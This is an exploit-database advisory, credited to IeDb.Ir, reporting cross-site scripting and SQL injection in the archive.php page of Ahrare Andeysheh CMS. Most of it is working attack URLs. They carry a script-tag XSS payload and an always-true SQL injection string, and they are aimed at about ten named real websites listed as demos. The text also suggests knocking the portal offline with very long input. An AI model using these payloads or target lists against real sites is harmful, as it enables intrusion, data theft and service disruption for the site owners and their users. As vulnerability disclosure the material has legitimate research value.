Home / exploitsPDF  

Ahrare Andeysheh Cms Multiple Vulnerabilities

Posted on 30 November -0001

<HTML><HEAD><TITLE>Ahrare Andeysheh Cms Multiple Vulnerabilities</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#####################################

# Iranian Exploit DataBase

# Ahrare Andeysheh Cms Multiple Vulnerabilities

# Vulnerability : Xss & Sql Injection & Poc

# Vulnerability on : archive.php

# Version : All Versions

# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

# Vendor site : http://www.ahrareandeysheh.com/

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

# Archive Exploit = http://kkli.ir/aOFh6

#####################################

# Bug :
[Xss And Sql Injection] to from=1395/01/01

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999

Poc :

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--

# Dem0 [ Xss And Sqli]

http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999

Demo [Poc]

http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--

Insert Java Code Or very long input, and disrupt the system And This portal will be unavailable.


# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

#####################################

Tnks To : All Member In Iedb.ir And Iedb.ir/acc

B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4

Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum

#####################################

# Archive Exploit = http://iedb.ir/exploits-5061.html

#####################################
</BODY></HTML>

 

TOP

Malware :

Exploits :